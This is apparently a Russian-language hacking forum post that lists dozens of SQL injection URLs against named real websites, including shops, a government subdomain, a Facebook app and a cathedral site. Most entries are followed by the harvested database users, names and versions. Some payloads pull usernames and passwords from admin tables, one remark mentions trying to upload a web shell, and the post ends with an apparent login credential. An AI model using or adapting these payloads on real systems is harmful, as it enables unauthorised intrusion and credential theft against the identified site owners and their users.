SQL Инъекции

Code:

_http://acutecp.rediscussed.com/?p=-3%27+union+select+1,2,3,4,concat_ws%280x3a,username,password%29,6,7,8,9,10,11+from+users--+

web_settings.php

PHP:

...$result     = mysql_query("SELECT `id`,`page_title`,`page_description`,`page_keywords`,`page_content`,`page_status`,`page_views`,`page_created`,`page_last_edited`,`user_created`,`user_last_edit` FROM `content` WHERE id='$p'",$conn) or die(mysql_error());
$page_result     = mysql_fetch_row($result);...

 

Code:

http://pgroup.ru/?a=news&id=-1+union+select+1,user(),3,4,5--+

root@localhost

 

Code:

http://tuile.ru/more.php?do=more&catid=-1%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11%20--+

User: [email protected]
Database: gutter_tu
Version: 5.1.41-log

Code:

http://www.vcspartak.ru/index.php?lang=ru&id=-1%20UNION%20SELECT%20concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2%20--+

User: [email protected]
Database: vcspartak_db
Version: 4.1.22-log

Code:

http://www.savatouristik.ru/index.php?mid_open=7&id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29%20--+

User: client304@localhost
Database: savatour
Version: 4.0.27

 

Code:

http://www.sacvoiaj.md/admin/main.php?id=-1+union+select%20+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8%20--

database: 18831
version: 5.0.77
user: 18831@localhost

 

Code:

http://www.mcpies.com/about_us/view_news.php?id=13333333+union+select+1,2,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7,8,9,10,11+from+NewInTheNews/*

Version: 4.1.19-log
User: mariecallenders@localhost
Database: db_mcpies_com

Code:

http://sloboda.su/flats.php?id=-5+union+select+1,concat_ws(0x3a%20%20,user(),database(),version()),3,4,5,6,7+from+sev_users

Version: 5.0.67-log
User: [email protected]
Database: u68381_sloboda

Code:

http://www.conscioustalk.net/resource_listing.php?cid=-10+union+select+1,concat_ws(0x3a%20%20,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13--

Version: 5.0.27-standard
User: root@localhost
Database: ct

 

http://www.armeniatv.com/news.php?vid=-3737+union+select+1,2,3,4,5,6,7,8&year=2010&month=02&day=03

user() : armenia_armuser@localhost

version() : 5.0.90-community

database() : armenia_armeniadb

 

Code:

http://www.olimp-group.ru/index.php?ob=list_one&id=-1%20UNION%20SELECT%201,database%28%29,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,user%28%29,28,29,30,31,32,33,34,35,36,37,38,39,40%20--+

User: olimpgro@localhost
Database: wwwolimpgroupru
Version: 4.1.25-log

 

Скуля на FACEBOOK!

Code:

http://apps.facebook.com/ifundrazr/fundraise.php?cid=-304+and+1=2+union+select+1,2,3,4,5,6,unhex(hex(concat_ws(0x3a,user(),database(),@@version))),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--

signalpa_rockaja@localhost
signalpa_fbmFundRraise
5.0.90-community

 

Code:

http://www.mens-groom.com/products.php?id=1'+and+1=2+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a%20%20,user(),database(),version()),11+from+users/*

User: [email protected]
Version: reflexint
Database: 5.0.27-standard

Code:

http://mytoy.ru/cat.html?cat_id=300000000000000+UNION+SELECT+1,2,concat_ws(0x3a%20%20,user(),database(),version()),4,5/*

User: mytoyru_old@localhost
Version: 5.0.26-log
Database: mytoyru_old

Code:

http://www.luchvrn.ru/news.php?id=-999+union+select+1,2,3,concat_ws(0x3a%20%20,user(),database(),version()),5,6,7

User: luchvrn8_news@localhost
Version: 4.1.25-log
Database: luchvrn8_news

 

Code:

http://www.tambovlib.ru/index.php?id=gallery.imgview.1234567%27+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10+--+

User: lib@localhost
Database: lib
Version: 5.0.45

Code:

http://propel.ru/forum/see.php?id=-1%20UNION%20SELECT%201,2,3,4,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,6,7,8,9,10,11%20--+

User: propeltu_propel@localhost
Database: propeltu_propel
Version: 5.0.26-log

Code:

http://www.pulsarpkp.ru/content.php?id=-1%27%20UNION%20SELECT%20concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29%20--+

User: Uwww3154S@localhost
Database: udb3154
Version: 4.0.26-log


Ну и PR семёра, не нашёл я админку

Code:

http://ar.economy.gov.ru/ru/index.php?incl/media/id.txt?&date23=-1%27+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++

User: admreforma@localhost
Database: admreforma
Version: 5.0.51a-3ubuntu5.5-log1

 

MSSQL

Code:

http://www.vineyardsproperties.com/about-us-details.asp?ID=27%27+or+1=%28SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES%29+--+

Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
User: PEPE\IUSR_SYLVESTER
Database: vineyardsproperties

 

Сайт Акеллы:

Code:

http://www.akella.com/gameclub/rating.php?id=-227+union+select+concat_ws(0x3a%20%20,user(),database(),version()),2,3,4,5,6+from+users--

User: akella@localhost
Database: gameclub
Version: 4.1.11

 

какой то шоп:

Code:

http://www.dgh.com.au/product.php?id=7UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+LIMIT+1,1/*

Database Version: 4.1.22-standard-log
Database name: dghco_db
User name: [email protected]

UK shop:

Code:

http://www.stows.co.uk/index.php?_a=viewProd&productId=979'

Database Version: 5.0.45

сегодня видать тока шопы)

Code:

http://www.academy-clothes.co.uk/site/show_product.asp?SECTION=BRANDS&CATEGORY=&ID=&productid=56

Database Version: Microsoft SQl Server ???
Database name: Их там около десяти.

магаз коробок)

Code:

http://www.hazmatpackagingandsupplies.com/store/index.php?_a=viewProd&productId=2879

Database Version: 5.0.90
User: hazmatpa_store@localhost
Database: hazmatpa_store

 

Code:

http://www.letogroup.ru/news.php?id=-9999+union+select+1,concat_ws(0x3a%20%20,user(),database(),version()),3,4/*

User: letogroup@localhost
Version: 4.1.22-lk-log
Database: letogroup

Code:

http://www.casinophiles.com/news.php?id=-1301+union+select+1,concat_ws(0x3a%20%20,user(),database(),version()),3,4,5--

User: root@localhost
Version: 5.0.90-log
Database: extra

 

http://www.fctwente.nl/nieuws/index.php?item=9781+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

user() : fctwente@localhost

version() : 4.0.26-log

database() : fctwente_site

 

Code:

http://www.salcath.co.uk/news.php?id=-391+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a%20%20,user(),database(),version()),19,20,21,22,23--

User: SALISBURYCATHEDR@LOCALHOST
Version: 4.1.20
Database: SALISBURYCATHEDRAL

Google PR: 5

Code:

http://www.ssdistributors.com/title.php?id=-1+union+select+1,concat_ws(0x3a%20%20,user(),database(),version()),3,4,5,6,7,8,9,10,11,12

User: ssdistributors@localhost
Version: ssdistributors
Database: 5.0.45

 

http://www.lemniscaat.nl/dynamic/genrelijst.php?genre=-28+union+select+1,2,3,4--

user() : [email protected]

version() : 5.0.32-Debian_7etch8-log

database() : pushki00_lemdb

 

Code:

http://www.2kaudit.ru/services.php?id=-19+and+1=2+union+all+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),5,6,7,8,9,10,11,12--

version:4.0.27-log
user:[email protected]
database:2kaudit-ru

 

Code:

http://www.profitcon.ru/index.php?page=our_seminars&pid=-100155+and+1=2+union+all+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,name,password,email),0x71),0x71),5,6,7,8,9,10,11,12,13,14+from+adkaudit_admin+limit+1+offset+0--

 

Китайский-порник
никак не могу залить шелл на скули(
version:5.0.77-log
user:awkw5@localhost

http://www.kikowu.com/members/index.php?cat=(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by%20concat(mid((select+user()+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z)

помоему надо залогиниться сначала:
http://bassdude:521111